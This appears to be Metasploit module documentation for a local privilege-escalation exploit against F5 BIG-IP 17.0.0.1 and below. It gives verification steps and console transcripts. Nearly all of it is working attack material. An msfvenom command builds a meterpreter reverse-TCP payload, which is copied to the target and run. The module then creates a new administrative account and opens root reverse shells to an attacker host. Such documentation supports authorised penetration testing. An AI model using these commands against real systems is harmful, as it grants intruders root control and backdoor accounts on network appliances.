## Vulnerable Application

The vulnerable application is F5 Big-IP version 17.0.0.1 and below. It can be
downloaded as a VMWare image for free (you have to create an account) from
https://downloads.f5.com. You can register for a free 30-day trial if you like,
but it's not required to test this.

Boot the VM and set an admin password by logging in with the default credentials
(admin / admin). You'll need that password.

## Verification Steps

1. Install the application
2. Start `msfconsole`
3. Do: Get a non-root session somehow (eg: `use multi/handler` / `set PAYLOAD linux/x64/meterpreter_reverse_tcp` then `./msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=10.0.0.179 LPORT=4444 -f elf > testexploit.elf && scp testexploit.elf root@10.0.0.162:/tmp && ssh root@10.0.0.162 /bin/bash << EOF
chmod +x /tmp/testexploit.elf
sudo -u apache /tmp/testexploit.elf
EOF`)
4. Do: `use exploit/linux/local/f5_create_user`
5. Do `set SESSION <sessionid>`
6. Do: `run`
7. You should get a session

## Options

### `USERNAME` / `PASSWORD`

The username and final password for the account. If blank, they'll be randomly
generated.

### `CREATE_SESSION`

If set (which is default), will spawn a root session. Otherwise, simply creates
the account.

## Scenarios

### F5 Big-IP 17.0.0.1 - Create a session with random creds

First, get a non-root session however you can. You can use a `multi/handler`
and `msfvenom`:

```
msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp

msf6 exploit(multi/handler) > set PAYLOAD linux/x64/meterpreter_reverse_tcp
PAYLOAD => linux/x64/meterpreter_reverse_tcp

msf6 exploit(multi/handler) > set LHOST 10.0.0.179
LHOST => 10.0.0.179

msf6 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 10.0.0.179:4444 
[*] Meterpreter session 1 opened (10.0.0.179:4444 -> 10.0.0.162:34140) at 2022-11-14 15:59:49 -0800

[...run the payload...]

meterpreter > getuid
Server username: apache

meterpreter > bg

msf6 exploit(multi/handler) > setg SESSION 1
SESSION => 1
```

To create and run the payload, in another window:

```
$ ./msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=10.0.0.179 LPORT=4444 -f elf > testexploit.elf && chmod +x testexploit.elf && scp testexploit.elf root@10.0.0.162:/tmp && ssh root@10.0.0.162 sudo -u apache /tmp/testexploit.elf
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 1068640 bytes
Final size of elf file: 1068640 bytes
testexploit.elf
```

Now that we have a session, we can just run the module:

```
msf6 exploit(multi/handler) > use exploit/linux/local/f5_create_user
[*] No payload configured, defaulting to cmd/unix/python/meterpreter/reverse_tcp
msf6 exploit(linux/local/f5_create_user) > exploit

[*] Started reverse TCP handler on 10.0.0.179:4444 
[*] Will attempt to create user 7yI5vLIK / woquVd36PhcG, then change password to 9d9s83bBPwu5 when creating a session
[+] Service didn't return an error, so user was likely created!
[*] Attempting create a root session...
[*] Sending stage (40168 bytes) to 10.0.0.162
[*] Meterpreter session 2 opened (10.0.0.179:4444 -> 10.0.0.162:45254) at 2022-11-14 16:02:10 -0800

meterpreter > getuid
Server username: root
```

### F5 Big-IP 17.0.0.1 - Create a session with set creds

Create a session as shown above, then:

```
msf6 exploit(linux/local/f5_create_user) > set USERNAME mymsfdemouser
USERNAME => mymsfdemouser
msf6 exploit(linux/local/f5_create_user) > set PASSWORD mybigmsfdemopassword
PASSWORD => mybigmsfdemopassword
msf6 exploit(linux/local/f5_create_user) > set VERBOSE true
VERBOSE => true
msf6 exploit(linux/local/f5_create_user) > exploit

[*] Started reverse TCP handler on 10.0.0.179:4444 
[*] Will attempt to create user mymsfdemouser / QVEE0pqM7pAd, then change password to mybigmsfdemopassword when creating a session
[*] Hashing the password with a pseudorandom salt
[+] Service didn't return an error, so user was likely created!
[*] Attempting create a root session...
[*] Sending stage (40164 bytes) to 10.0.0.162
[*] Output from su command: Password: You are required to change your password immediately (root enforced)
(current) BIG-IP password: New BIG-IP password: Retype new BIG-IP password: Changing password for mymsfdemouser.
[*] Meterpreter session 3 opened (10.0.0.179:4444 -> 10.0.0.162:49646) at 2022-11-14 16:03:04 -0800

meterpreter > getuid
Server username: root
```

### F5 Big-IP 17.0.0.1 - Just create an account with random creds

Get a session as shown above, then:

```
msf6 exploit(linux/local/f5_create_user) > set CREATE_SESSION false
CREATE_SESSION => false
msf6 exploit(linux/local/f5_create_user) > exploit

[*] Started reverse TCP handler on 10.0.0.179:4444 
[*] Will attempt to create user hKjGGrlU / yRQijFQjVjqa
[*] Hashing the password with a pseudorandom salt
[+] Service didn't return an error, so user was likely created!
^C[*] Exploit completed, but no session was created.
```

### F5 Big-IP 17.0.0.1 - Just create an account with set creds

Get a session as shown above, then:

```
msf6 exploit(linux/local/f5_create_user) > set CREATE_SESSION false
CREATE_SESSION => false
msf6 exploit(linux/local/f5_create_user) > set USERNAME mymsfdemouser2
USERNAME => mymsfdemouser2
msf6 exploit(linux/local/f5_create_user) > set PASSWORD mybigmsfdemopassword
PASSWORD => mybigmsfdemopassword
msf6 exploit(linux/local/f5_create_user) > exploit

[*] Started reverse TCP handler on 10.0.0.179:4444 
[*] Will attempt to create user mymsfdemouser2 / mybigmsfdemopassword
[*] Hashing the password with a pseudorandom salt
[+] Service didn't return an error, so user was likely created!
^C[*] Exploit completed, but no session was created.
```

### F5 Big-IP 17.0.0.1 - Create an account with an error

Get a session as shown above, then (we use a duplicate username):

```

[*] Started reverse TCP handler on 10.0.0.179:4444 
[*] Will attempt to create user mymsfdemouser2 / mybigmsfdemopassword
[*] Hashing the password with a pseudorandom salt
[-] mcp query returned an error message: 01020066:3: The requested user (mymsfdemouser2) already exists in partition Common. (code: 16908390)
```
